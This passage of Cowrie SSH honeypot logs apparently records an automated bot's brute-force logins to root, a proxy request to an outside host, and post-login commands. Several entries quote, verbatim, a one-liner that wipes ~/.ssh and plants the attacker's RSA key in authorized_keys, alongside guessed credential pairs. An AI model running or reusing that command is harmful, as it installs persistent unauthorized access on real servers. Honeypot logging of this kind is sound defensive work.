4","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T16:10:06.972671Z","src_ip":"212.227.235.229","session":"c9bd7e109295"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:10:07.362336Z","src_ip":"212.227.235.229","session":"c9bd7e109295"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T16:10:07.492169Z","session":"c9bd7e109295"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53756,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f73b83b2792","protocol":"ssh","message":"New connection: 212.227.235.229:53756 (1.2.3.4:22) [session: 0f73b83b2792]","sensor":"my-vps","timestamp":"2025-08-28T16:10:22.121164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:10:22.122103Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:10:22.435674Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.login.success","username":"root","password":"9527","message":"login attempt [root/9527] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:10:23.733654Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:10:24.849609Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:10:24.850286Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:10:24.851323Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:25.166949Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:10:25.817865Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:10:25.818599Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:10:26.135536Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:26.136431Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53770,"dst_ip":"1.2.3.4","dst_port":22,"session":"468e55d6fb69","protocol":"ssh","message":"New connection: 212.227.235.229:53770 (1.2.3.4:22) [session: 468e55d6fb69]","sensor":"my-vps","timestamp":"2025-08-28T16:10:26.459597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:10:26.460735Z","src_ip":"212.227.235.229","session":"468e55d6fb69"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:10:26.785679Z","src_ip":"212.227.235.229","session":"468e55d6fb69"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:10:28.133439Z","src_ip":"212.227.235.229","session":"468e55d6fb69"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:29.460243Z","src_ip":"212.227.235.229","session":"468e55d6fb69"}
{"eventid":"cowrie.session.closed","duration":"59.8","message":"Connection lost after 59.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:29.490107Z","src_ip":"161.35.112.121","session":"4d24d3981473"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45100,"dst_ip":"1.2.3.4","dst_port":22,"session":"17f2b00d457e","protocol":"ssh","message":"New connection: 212.227.235.229:45100 (1.2.3.4:22) [session: 17f2b00d457e]","sensor":"my-vps","timestamp":"2025-08-28T16:10:29.778025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:10:29.778708Z","src_ip":"212.227.235.229","session":"17f2b00d457e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:10:30.094851Z","src_ip":"212.227.235.229","session":"17f2b00d457e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:10:31.405070Z","src_ip":"212.227.235.229","session":"17f2b00d457e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:31.723253Z","src_ip":"212.227.235.229","session":"17f2b00d457e"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:31.724920Z","src_ip":"212.227.235.229","session":"0f73b83b2792"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58094,"dst_ip":"1.2.3.4","dst_port":22,"session":"96cd6486d3d3","protocol":"ssh","message":"New connection: 212.227.235.229:58094 (1.2.3.4:22) [session: 96cd6486d3d3]","sensor":"my-vps","timestamp":"2025-08-28T16:10:34.166127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:10:34.167063Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:10:34.373528Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58452,"dst_ip":"1.2.3.4","dst_port":22,"session":"f978e557d57e","protocol":"ssh","message":"New connection: 212.227.235.229:58452 (1.2.3.4:22) [session: f978e557d57e]","sensor":"my-vps","timestamp":"2025-08-28T16:10:34.945861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:10:34.946507Z","src_ip":"212.227.235.229","session":"f978e557d57e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:10:35.045689Z","src_ip":"212.227.235.229","session":"f978e557d57e"}
{"eventid":"cowrie.login.success","username":"root","password":"maxima","message":"login attempt [root/maxima] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:10:35.241680Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.login.failed","username":"solv","password":"123456","message":"login attempt [solv/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T16:10:35.345896Z","src_ip":"212.227.235.229","session":"f978e557d57e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:10:35.677314Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:10:35.678322Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:10:35.679671Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:35.888684Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:10:36.367813Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:10:36.368905Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:36.471535Z","src_ip":"212.227.235.229","session":"f978e557d57e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:10:36.579236Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:36.580212Z","src_ip":"212.227.235.229","session":"96cd6486d3d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52042,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4d83c2844aa","protocol":"ssh","message":"New connection: 212.227.235.229:52042 (1.2.3.4:22) [session: d4d83c2844aa]","sensor":"my-vps","timestamp":"2025-08-28T16:10:36.784108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:10:36.785119Z","src_ip":"212.227.235.229","session":"d4d83c2844aa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:10:36.990945Z","src_ip":"212.227.235.229","session":"d4d83c2844aa"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:10:37.856911Z","src_ip":"212.227.235.229","session":"d4d83c2844aa"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:39.065908Z","src_ip":"212.227.235.229","session":"d4d83c2844aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52044,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba5ce3517cec","protocol":"ssh","message":"New connection: 212.227.235.229:52044 (1.2.3.4:22) [session: ba5ce3517cec]","sensor":"my-vps","timestamp":"2025-08-28T16:10:39.269191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:10:39.270236Z","src_ip":"212.227.235.229","session":"ba5ce3517cec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:10:39.475766Z","src_ip":"212.227.235.229","session":"ba5ce3517cec"}
